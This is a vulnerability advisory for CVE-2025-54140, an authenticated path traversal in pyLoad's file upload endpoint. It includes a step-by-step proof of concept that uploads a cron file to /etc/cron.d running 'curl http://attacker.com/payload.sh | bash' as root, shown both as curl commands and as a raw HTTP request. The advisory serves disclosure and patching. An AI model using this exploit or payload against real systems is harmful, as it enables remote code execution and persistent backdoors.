CVE-2025-54140

## Summary An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to: * **Remote Code Execution (RCE)** * **Local Privilege Escalation** * **System-wide compromise** * **Persistence and backdoors** --- ### Vulnerable Code File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109) ```python @json_blueprint.route("/upload", methods=["POST"]) def upload(): dir_path = api.get_config_value("general", "storage_folder") for file in request.files.getlist("file"): file_path = os.path.join(dir_path, "tmp_" + file.filename) file.save(file_path) ``` **Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences. ### (Proof of Concept) 1. **Clone and install pyLoad from source** (`pip install pyload-ng`): ```bash git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload ``` 2. **Or install via pip (PyPi) in virtualenv:** ```bash python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload ``` 1. **Login and obtain session token** ```bash curl -c cookies.txt -X POST http://127.0.0.1:8000/login \ -d "username=admin&password=admin" ``` 2. **Create malicious cron payload** ```bash echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit ``` 3. **Upload file with path traversal filename** ```bash curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \ -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor" ``` 4. On the next cron tick, a reverse shell or payload will be triggered. ### BurpSuite HTTP Request ``` POST /json/upload HTTP/1.1 Host: 127.0.0.1:8000 Cookie: session=SESSION_ID_HERE Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e --------------------------d74496d66958873e Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor" Content-Type: application/octet-stream */1 * * * * root curl http://attacker.com/payload.sh | bash --------------------------d74496d66958873e-- ```